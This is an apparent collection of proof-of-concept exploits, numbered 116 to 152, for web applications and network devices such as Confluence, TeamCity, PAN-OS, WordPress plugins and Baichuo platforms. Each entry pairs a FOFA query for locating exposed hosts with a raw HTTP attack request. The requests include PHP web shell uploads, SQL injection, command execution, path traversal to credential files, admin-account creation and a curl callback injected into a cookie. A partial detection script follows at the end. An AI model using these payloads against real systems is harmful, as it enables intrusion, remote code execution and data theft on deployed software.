User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "[value obtained in step 1]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Baichuo (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

Uploaded file path: boot/web/upload/weblogo/1.php

122. Baichuo (北京百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the base64 encoding of the SQL statement (encoded, not encrypted); c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to: select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The payload writes the command output into the X-Cmd-Response response header, so check the response headers rather than the body. Note the \uXXXX escapes in the label parameter: any detection that matches only on the literal quote and bracket characters misses this request.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then reachable at http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can be run from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the request line exactly as shown: most HTTP clients collapse the ../ segments before sending (curl needs --path-as-is), and a normalized path never reaches the vulnerable handler.

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS lookup for the entity host arriving at the dnslog side confirms that the parser resolved the external entity.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid obtained in step 1 in the uuid request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <= 20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

The request creates a SYSTEM_ADMIN user without authentication; the ;.jsp suffix on the jsp parameter is what gets the request past the authentication check.

CVE-2024-27199 (path traversal to authenticated pages)
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

Error-based (updatexml): the database version is returned in the XPath error message.

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

Time-based blind (SLEEP(5)): a vulnerable host delays its response by about five seconds. The same check applies to the three Kelixun entries that follow.

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak (default) credentials
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id). The user/passwd pair is fixed in the POC; passwd is base64 as well (YWJjMTIzNDVjYmE decodes to abc12345cba).
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-address>`;
Accept-Encoding: gzip

The SESSID value traverses into the device_telemetry directory and becomes a filename; the backtick command embedded in it runs when telemetry later processes that file, so the DNS callback is delayed rather than immediate.

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

url is base64 for rtsp://a; transport URL-decodes to || (echo '[S]'; id; echo '[E]')#; so the output of id appears between [S] and [E] in the response.

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The validationRules script is evaluated on the server with access to Java classes, so java.lang.ProcessBuilder runs the command and its output is returned as the function result.

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The ;swagger-ui/ path suffix is the authentication bypass: the request reaches /dataSetParam/verification without a session because the path is matched against the swagger-ui allow-list.

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. the command is injected through the username half of the Basic credentials.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

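Detection side, for the request-pattern entries above (TeamCity in 132, LoadMaster in 152, D-Link in 144, Confluence in 123, NextChat in 136, PAN-OS in 145, MajorDoMo in 146). The script below is an added example written for this page, not code from any of those vendors or from the original post. It undoes the encodings these payloads rely on (percent-encoding, \uXXXX escapes, base64 inside Basic credentials and inside the D-Link system= parameter) before matching, because a rule that inspects only the raw bytes never sees the bracket and quote characters of the Confluence payload. The sample requests are constructed; the indicator regexes are this editor's reading of the requests quoted above, and the Basic-auth and system= values are the ones those entries show.

```python
"""Request normalization plus indicator matching for the POCs on this page.
Added example, not vendor code. Sample traffic below is constructed."""
import base64
import binascii
import re
from urllib.parse import unquote

# (label, regex applied to the normalized request target, body and Cookie header)
INDICATORS = [
    ("CVE-2024-27198 TeamCity ;.jsp auth bypass",
     re.compile(r"\?jsp=/app/rest/\S*;\.jsp", re.I)),
    ("CVE-2024-27199 TeamCity traversal into admin/",
     re.compile(r"^/(?:res|update|\.well-known/acme-challenge)/(?:\.\./)+admin/", re.I)),
    ("generic path traversal", re.compile(r"(?:^|/)\.\.(?:/|$)")),
    ("CVE-2023-49785 NextChat /api/cors SSRF", re.compile(r"^/api/cors/https?:", re.I)),
    ("CVE-2024-3400 PAN-OS SESSID traversal", re.compile(r"SESSID=/?(?:\.\./)+", re.I)),
    ("D-Link nas_sharing.cgi command injection",
     re.compile(r"^/cgi-bin/nas_sharing\.cgi\?.*\bsystem=", re.I)),
    ("MajorDoMo thumb.php transport= RCE",
     re.compile(r"^/modules/thumb/thumb\.php\?.*\btransport=", re.I)),
    ("OGNL / template injection (Confluence text-inline.vm)",
     re.compile(r"#request\[|\.findValue\(|freemarker\.template\.utility\.Execute")),
]
SHELL_META = re.compile(r"[;|`$]")


def normalize(text):
    """Percent-decode until stable (max 3 rounds), then expand \\uXXXX escapes,
    so that %2b or \\u0027 cannot hide a payload from the regexes."""
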